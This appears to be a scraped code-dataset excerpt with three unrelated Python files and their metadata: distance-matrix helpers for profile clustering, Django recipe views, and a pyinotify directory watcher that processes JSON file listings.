row_end = min(row_start + profiles_per_block, nb_series)
for column_start in range(0, row_start + 1, profiles_per_block):
column_end = min(column_start + profiles_per_block, nb_series)
blocks.append(((row_start, row_end), (column_start, column_end)))
return blocks
def _calculate_pair_list(query_indices, metric, data_df):
result = []
for i1, i2 in query_indices:
profile1 = data_df.loc[i1]
profile2 = data_df.loc[i2]
distance = metric.distance(profile1, profile2)
result.append(distance)
return result
def _calculate_block(block_indices, metric, data_df):
"""
Calculates the distances between the first and second collection of profiles (in tuple profile_tuple)
"""
(row_start, row_end), (column_start, column_end) = block_indices
profiles1 = data_df.iloc[row_start: row_end]
profiles2 = data_df.iloc[column_start: column_end]
distance_matrix = np.zeros((profiles1.shape[0], profiles2.shape[0]))
for idx1, (index, profile1) in enumerate(profiles1.iterrows()):
for idx2, (index, profile2) in enumerate(profiles2.iterrows()):
distance = metric.distance(profile1, profile2)
distance_matrix[idx1, idx2] = distance
return distance_matrix | jankrans/Conditional-Generative-Neural-Networks | repositories/profile-clustering/energyclustering/clustering/similarity/distmatrix.py | distmatrix.py | py | 4,922 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "distributed.Client",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "numpy.unique",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.array_split",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tqdm.tqdm",
"line... |
30586804681 | from django.contrib.formtools.wizard.views import SessionWizardView
from django.core.urlresolvers import reverse
from django.forms import modelformset_factory
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
# Create your views here.
from recipe.forms import *
from recipe.models import Recipe
FORMS = [("recipe", RecipeForm),
("malt", modelformset_factory(MaltIL, formset=MaltFormSet, extra=3, exclude=["recipe"])),
("hops", modelformset_factory(HopsIL, formset=HopsFormSet, extra=3, exclude=["recipe"])),
("yeast", modelformset_factory(YeastIL, formset=YeastFormSet, extra=3, exclude=["recipe"]))]
class RecipeWizard(SessionWizardView):
template_name = "recipe/recipe_wizard.html"
def save_recipe(self, form_dict):
recipe = form_dict['recipe'].save()
malts = form_dict['malt'].save(commit=False)
hopss = form_dict['hops'].save(commit=False)
yeasts = form_dict['yeast'].save(commit=False)
for malt in malts:
malt.recipe = recipe
malt.save()
for hops in hopss:
hops.recipe = recipe
hops.save()
for yeast in yeasts:
yeast.recipe = recipe
yeast.save()
return recipe
def done(self, form_list, form_dict, **kwargs):
recipe = self.save_recipe(form_dict)
return HttpResponseRedirect(reverse('view_recipe', args=[recipe.id]))
def view_recipe(request, recipe_id):
recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
return render(request,
'recipe/viewrecipe.html',
{
'recipe': recipe,
})
def view_all_recipes(request):
recipes = Recipe.objects.all()
return render(request,
'recipe/viewallrecipes.html',
{
'recipes': recipes,
})
def brewmaster(request, recipe_id):
recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
return render(request,
'recipe/brewmaster.html',
{
'recipe': recipe,
}) | BrewRu/BrewRu | recipe/views.py | views.py | py | 2,193 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.modelformset_factory",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.forms.modelformset_factory",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "django.forms.modelformset_factory",
"line_number": 16,
"usage_type": ... |
17173794780 | # -*- coding: utf-8 -*-
# @Time : 2019/9/10 11:21
# @Author : bjsasc
import json
import logging
import os
import sys
import time
import DataUtil
from pyinotify import WatchManager, Notifier, ProcessEvent, IN_CLOSE_WRITE
# 设置日志输出两个handle,屏幕和文件
log = logging.getLogger('file watch ---')
fp = logging.FileHandler('a.log', 'a+', encoding='utf-8')
fs = logging.StreamHandler()
log.addHandler(fs)
log.addHandler(fp)
log.setLevel(logging.DEBUG)
FILE_DIR = r'/home/bjsasc/test/' # 监听文件目录
def check_dir_exist():
"""
检查文件目录是否存在
"""
if not FILE_DIR:
log.info("The WATCH_PATH setting MUST be set.")
sys.exit()
else:
if os.path.exists(FILE_DIR):
log.info('Found watch path: path=%s.' % (FILE_DIR))
else:
log.info('The watch path NOT exists, watching stop now: path=%s.' % (FILE_DIR))
sys.exit()
def read_json_from_file(file_path):
"""
从文件中读取json数据
:param file_path:
"""
with open(file_path) as f:
s = f.read()
result = json.loads(s)
# 处理数据
for i in result:
data_process(i)
def data_process(data: dict):
"""
处理从json中读取到的数据
:param data:
"""
file_path = data["file_path"]
# 从文件名称获取文件信息
name_info = DataUtil.parse_name(file_path)
weixing_info = name_info[0]
zaihe_info = name_info[1]
# 打开文件检查
checknum = DataUtil.check_file(file_path)
# 构造保存数据库的dict
result = {}
result['type'] = '1'
result['name'] = file_path
result['suffix'] = 'fits'
result['sourcepath'] = file_path
result['checknum'] = checknum
result['status'] = '1'
# 保存数据到数据库
DataUtil.save_data(result)
# 拷贝文件
DataUtil.copy_file(file_path, file_path)
# 更新数据
DataUtil.update_date()
# 调用远程接口
DataUtil.notice(file_path)
class EventHandler(ProcessEvent):
def process_IN_CLOSE_WRITE(self, event):
"""
监听文件传输完成时间,只实现了传输完成监听
:param event:
"""
# logging.info("create file: %s " % os.path.join(event.path, event.name))
file_path = os.path.join(event.path, event.name)
time.sleep(2)
log.info('write file finished ...%s' % (file_path))
read_json_from_file(file_path)
def main():
"""
文件监听的入口程序
"""
check_dir_exist()
wm = WatchManager()
notifier = Notifier(wm, EventHandler())
wm.add_watch(FILE_DIR, IN_CLOSE_WRITE, rec=True, auto_add=True)
log.info('Now starting monitor %s' % (FILE_DIR))
notifier.loop()
if __name__ == '__main__':
main()
| xingyundeyangzhen/zxm | DataWatcher.py | DataWatcher.py | py | 2,812 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "logging.FileHandler",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.StreamHandler",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "logging.D... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.